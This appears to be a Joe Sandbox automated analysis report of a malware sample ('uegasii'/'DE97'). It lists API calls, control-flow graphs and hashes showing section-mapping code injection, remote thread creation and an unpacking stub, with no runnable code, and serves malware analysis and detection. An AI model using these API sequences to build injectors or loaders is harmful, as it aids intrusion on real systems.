Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_DE97.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_DE97.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
APIs
• LocalAlloc.KERNELBASE(00000000,004F23DC,00415CD5), ref: 00415658
Memory Dump Source
• Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0
Memory Dump Source
• Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_DE97.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• BuildCommDCBW.KERNEL32(00000000,?), ref: 0041587D
• SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004158C1
• GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004158D2
Strings
Memory Dump Source
• Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
Similarity
• API ID: BuildCalendarCommInfoNamePathShort
• String ID: -
• API String ID: 1570861727-2547889144
APIs
• QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415944
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041595F
• HeapDestroy.KERNEL32(00000000), ref: 0041597E
• GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415986
Memory Dump Source
• Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
Similarity
• API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
• String ID:
• API String ID: 367530164-0

Execution Graph

Execution Coverage: 10.6%
Dynamic/Decrypted Code Coverage: 16.5%
Signature Coverage: 0%
Total number of Nodes: 176
Total number of Limit Nodes: 8

Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415ABA
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415AC7
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00415ACE
                                                                                                                            • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415AD6
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415AEE
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415B15
                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00415B1E
                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00415B32
                                                                                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415B77
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00415B86
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415B8F
                                                                                                                            • ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00415BA1
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415BC8
                                                                                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415BF9
                                                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415C0D
                                                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,?,00417314,?,00000000), ref: 00415C4D
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415C54
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00415C5A
                                                                                                                            • GetBinaryTypeW.KERNEL32(00417334,?), ref: 00415C6C
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00415C7F
                                                                                                                            • GetLongPathNameA.KERNEL32(00417364,?,00000000), ref: 00415C92
                                                                                                                            • GetCommState.KERNEL32(00000000,00000000), ref: 00415C9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$CommFileName$FormatLengthPathReadStateTime$AdjustmentAliasAliasesAtomAttributesBinaryCompareComputerConfigConnectCopyDefaultExchangeExesFindInterlockedLongMessageModeModuleNamedOutputPipeReleaseSearchSemaphoreSystemType
                                                                                                                            • String ID: @3#v$P4#vp^5w$k`$}$
                                                                                                                            • API String ID: 3800548968-402751238
                                                                                                                            • Opcode ID: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction ID: b74f69d15b1c00e371bae04283b2e7407a3b84b28a54ffdc86722d59f2fd5859
                                                                                                                            • Opcode Fuzzy Hash: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction Fuzzy Hash: 6CB11671841528EBD725DB61DC48EEF7B78EF49350F0180AAF609A2150DB789AC1CFAD

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                            • Opcode Fuzzy Hash: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                            • Opcode Fuzzy Hash: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 494 403103-403127 495 403246-40324b 494->495 496 40312d-403145 494->496 496->495 497 40314b-40315c 496->497 498 40315e-403167 497->498 499 40316c-40317a 498->499 499->499 500 40317c-403183 499->500 501 4031a5-4031ac 500->501 502 403185-4031a4 500->502 503 4031ce-4031d1 501->503 504 4031ae-4031cd 501->504 502->501 505 4031d3-4031d6 503->505 506 4031da 503->506 504->503 505->506 507 4031d8 505->507 506->498 508 4031dc-4031e1 506->508 507->508 508->495 509 4031e3-4031e6 508->509 509->495 510 4031e8-403243 RtlCreateUserThread NtTerminateProcess 509->510 510->495
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 512 403257-40325f 513 4031f0-403243 RtlCreateUserThread NtTerminateProcess 512->513 514 403261-40327f 512->514 515 403246-40324b 513->515 520 403281 514->520 521 403286-403290 514->521 520->521 522 403283-403285 520->522 523 403292 521->523 524 403298-4032ba call 4012ec 521->524 522->521 523->524 526 403293-403297 523->526 530 4032be 524->530 530->530
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 66 60003c-600047 67 600049 66->67 68 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 66->68 67->68 83 600265-600289 call 600a69 68->83 84 60028b-600292 68->84 89 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 83->89 86 6002a1-6002b0 84->86 88 6002b2-6002cc 86->88 86->89 88->86 95 6003d1-6003e0 89->95 96 6003e2-600437 call 600ce7 95->96 97 600439-6004b8 VirtualFree 95->97 96->95 99 6005f4-6005fe 97->99 100 6004be-6004cd 97->100 103 600604-60060d 99->103 104 60077f-600789 99->104 102 6004d3-6004dd 100->102 102->99 106 6004e3-600505 102->106 103->104 109 600613-600637 103->109 107 6007a6-6007b0 104->107 108 60078b-6007a3 104->108 118 600517-600520 106->118 119 600507-600515 106->119 110 6007b6-6007cb 107->110 111 60086e-6008be LoadLibraryA 107->111 108->107 112 60063e-600648 109->112 115 6007d2-6007d5 110->115 117 6008c7-6008f9 111->117 112->104 113 60064e-60065a 112->113 113->104 116 600660-60066a 113->116 120 600824-600833 115->120 121 6007d7-6007e0 115->121 124 60067a-600689 116->124 126 600902-60091d 117->126 127 6008fb-600901 117->127 128 600526-600547 118->128 119->128 125 600839-60083c 120->125 122 6007e2 121->122 123 6007e4-600822 121->123 122->120 123->115 130 600750-60077a 124->130 131 60068f-6006b2 124->131 125->111 132 60083e-600847 125->132 127->126 129 60054d-600550 128->129 133 6005e0-6005ef 129->133 134 600556-60056b 129->134 130->112 135 6006b4-6006ed 131->135 136 6006ef-6006fc 131->136 137 600849 132->137 138 60084b-60086c 132->138 133->102 140 60056d 134->140 141 60056f-60057a 134->141 135->136 142 60074b 136->142 143 6006fe-600748 136->143 137->111 138->125 140->133 144 60059b-6005bb 141->144 145 60057c-600599 141->145 142->124 143->142 150 6005bd-6005db 144->150 145->150 150->129
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_600000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 465 415cf4-415cfb 466 415d00-415d10 465->466 467 415d12 466->467 468 415d18-415d1b 466->468 467->468 468->466 469 415d1d-415d3e LoadLibraryW call 415680 call 415910 468->469 474 415d40-415d47 469->474 475 415d57-415d5d 474->475 476 415d49-415d53 474->476 477 415d64-415d6b 475->477 478 415d5f call 415670 475->478 476->475 480 415d7a-415d81 477->480 481 415d6d-415d74 InterlockedDecrement 477->481 478->477 480->474 483 415d83-415d93 480->483 481->480 484 415da0-415db0 483->484 485 415db2 484->485 486 415db9-415dbc 484->486 485->486 486->484 487 415dbe-415dc9 486->487 488 415dd0-415dd5 487->488 489 415dd7-415ddd 488->489 490 415ddf-415de5 488->490 489->490 491 415de7-415df4 489->491 490->488 490->491
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNELBASE(00417374), ref: 00415D22
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00415D74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlockedLibraryLoad
                                                                                                                            • String ID: @3#v$k`$}$
                                                                                                                            • API String ID: 1728580480-3392953598
                                                                                                                            • Opcode ID: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction ID: e5749c029843646b42c966e7ad9aac78be9f25e1622ba3818e79b170e44d005a
                                                                                                                            • Opcode Fuzzy Hash: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction Fuzzy Hash: B7210830940A50CFC7249B24BD497EA7760EBC8321FA2847BD9499B291C67898C0CB8D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 493 415680-4157c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(004F23E0), ref: 0041575F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00419DC8), ref: 0041579C
                                                                                                                            • VirtualProtect.KERNELBASE(004F2224,004F23DC,00000040,?), ref: 004157BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction ID: 9cbdbad7550f6ba77ebf9f75069ac8a0e3d788a9a6da5ffb341793c156349206
                                                                                                                            • Opcode Fuzzy Hash: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction Fuzzy Hash: AD311960518780CAE305CB78FE647A23AA2EB69704F04807DD5488B3F1D7FE5928C72E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 531 746c0a-746c23 532 746c25-746c27 531->532 533 746c2e-746c3a CreateToolhelp32Snapshot 532->533 534 746c29 532->534 535 746c3c-746c42 533->535 536 746c4a-746c57 Module32First 533->536 534->533 535->536 541 746c44-746c48 535->541 537 746c60-746c68 536->537 538 746c59-746c5a call 7468c9 536->538 542 746c5f 538->542 541->532 541->536 542->537
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00746C32
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00746C52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Offset: 00743000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_743000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 921006f4b6a46a5521da69cdc927ffbdbde0fb2b985e75e2bf3e5e9eb8c49751
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: F1F06235600714ABD7202BF5A9CDB6A76E9EF4A724F100568E682910C0DB74FC454662

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 544 600e0f-600e24 SetErrorMode * 2 545 600e26 544->545 546 600e2b-600e2c 544->546 545->546
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_600000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
